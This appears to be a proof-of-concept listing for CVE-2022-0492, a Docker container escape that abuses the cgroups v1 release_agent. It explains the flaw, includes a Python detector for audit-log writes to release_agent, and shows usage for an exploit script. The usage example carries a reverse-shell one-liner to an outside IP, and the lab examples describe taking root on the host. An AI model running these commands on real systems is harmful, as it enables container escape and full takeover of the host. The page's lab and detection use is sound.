PoC details: 22fd863c78653c13da229a734b0087f81d635cce

Source
Related vulnerability
Title: Linux kernel authorization vulnerability (CVE-2022-0492)
Description: Linux kernel is the kernel used by Linux, the open-source operating system of the Linux Foundation (US). The Linux kernel has an authorization vulnerability that stems from the software's improper restriction of user permissions. An attacker can exploit it to bypass Linux kernel restrictions via the cgroups release_agent and escalate their privileges.
Description
Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)
Introduction
# CVE-2022-0492 Docker Breakout Checker and PoC

## Summary

Exploiting the vulnerability requires the attacker to have access to a Docker container running on a vulnerable system. Once exploited, the attacker can escape the container and gain complete control over the host system.

A vulnerability was found in the Linux kernel's cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c. Under certain circumstances, this flaw allows the cgroups v1 release_agent feature to be used to escalate privileges and unexpectedly bypass namespace isolation.

More simply put, cgroups v1 has a feature called release_agent that runs a program when a cgroup becomes empty (its last process exits). If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges and take control of the system. However, the release_agent file is owned by root, so only a user with root access should be able to modify it.
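Because the escape hinges on a write to `release_agent` (and on `notify_on_release` being set), a host-side audit trail of writes under `/sys/fs/cgroup` is a direct way to catch the technique. The detector below is an added example for this page, not code from the repository; it parses constructed auditd-style `SYSCALL`/`PATH` records (the sample lines are made up, and the `key="cgroup_write"` tag assumes a host rule such as `auditctl -w /sys/fs/cgroup -p wa -k cgroup_write`), groups records by audit serial, and flags writes that land on the two files the vulnerability depends on.

```python
import re
from collections import defaultdict

# Constructed sample records in an auditd-like key=value style (not real captures).
# Each SYSCALL line is paired with a PATH line under the same audit serial number.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1700000000.101:501): arch=c000003e syscall=257 success=yes exit=3 uid=0 auid=1000 pid=4242 comm="sh" exe="/bin/dash" key="cgroup_write"
type=PATH msg=audit(1700000000.101:501): item=0 name="/sys/fs/cgroup/rdma/release_agent" inode=1 mode=0100644 ouid=0 ogid=0 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.102:502): arch=c000003e syscall=257 success=yes exit=3 uid=0 auid=1000 pid=4242 comm="sh" exe="/bin/dash" key="cgroup_write"
type=PATH msg=audit(1700000000.102:502): item=0 name="/sys/fs/cgroup/rdma/x/notify_on_release" inode=2 mode=0100644 ouid=0 ogid=0 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.103:503): arch=c000003e syscall=257 success=yes exit=3 uid=0 auid=4294967295 pid=1 comm="systemd" exe="/usr/lib/systemd/systemd" key="cgroup_write"
type=PATH msg=audit(1700000000.103:503): item=0 name="/sys/fs/cgroup/memory/system.slice/cgroup.procs" inode=3 mode=0100644 ouid=0 ogid=0 nametype=NORMAL
"""

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SERIAL_RE = re.compile(r'msg=audit\(\d+\.\d+:(\d+)\)')

# Files whose modification is the signal: release_agent is what CVE-2022-0492 abuses,
# and notify_on_release must be set for the agent to fire at all.
WATCHED = {
    "release_agent": "high",
    "notify_on_release": "medium",
}


def parse_record(line):
    """Turn one audit-style line into a dict of its key=value fields plus its serial."""
    fields = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    m = SERIAL_RE.search(line)
    fields["serial"] = m.group(1) if m else None
    return fields


def group_events(lines):
    """Group SYSCALL and PATH records that share an audit serial into one event."""
    events = defaultdict(dict)
    for line in lines:
        if not line.strip():
            continue
        rec = parse_record(line)
        events[rec["serial"]].setdefault(rec.get("type", "?"), []).append(rec)
    return events


def detect_release_agent_writes(log_text):
    """Return one finding per write that touches a watched cgroup v1 control file."""
    findings = []
    for serial, recs in group_events(log_text.splitlines()).items():
        syscall = (recs.get("SYSCALL") or [{}])[0]
        for path in recs.get("PATH", []):
            name = path.get("name", "")
            base = name.rsplit("/", 1)[-1]
            if base in WATCHED and "/sys/fs/cgroup/" in name:
                findings.append({
                    "serial": serial,
                    "path": name,
                    "severity": WATCHED[base],
                    "pid": syscall.get("pid"),
                    "auid": syscall.get("auid"),
                    "comm": syscall.get("comm"),
                    "exe": syscall.get("exe"),
                })
    return findings


if __name__ == "__main__":
    for f in detect_release_agent_writes(SAMPLE_LOG):
        print(f"[{f['severity']}] serial={f['serial']} pid={f['pid']} "
              f"auid={f['auid']} comm={f['comm']} wrote {f['path']}")
```

The third event (a write to `cgroup.procs`) is ordinary cgroup housekeeping and is deliberately not flagged; only the two control files the escape needs produce findings, with the `auid` carried along so a write from a logged-in user session can be told apart from system daemons.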

## Usage

```
# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh CVE-2022-0492.sh    --checker                Verify if system is vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Execute command on host machine.
        sh CVE-2022-0492.sh -h|--help                   Print the help panel.

[>] Example:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

```

## Examples

### [Hamlet](https://tryhackme.com/room/hamlet) from TryHackMe
Root on the host machine obtained by disabling UFW and then sending a reverse shell.

![](/assets/Hamlet.gif)


### [Misguided Ghosts](https://tryhackme.com/room/misguidedghosts) from TryHackMe
Root on the host machine obtained by setting the SUID bit on bash, and a reverse shell was also sent.

![](/assets/Misguided_Ghosts.gif)

#### Sources:
- https://github.com/puckiestyle/CVE-2022-0492
- http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492
File snapshot

```
[4.0K] /data/pocs/22fd863c78653c13da229a734b0087f81d635cce
├── [4.0K] assets
│   ├── [1.5M] Hamlet.gif
│   └── [1.9M] Misguided_Ghosts.gif
├── [4.7K] CVE-2022-0492.sh
├── [ 34K] LICENSE
└── [2.1K] README.md

1 directory, 5 files
```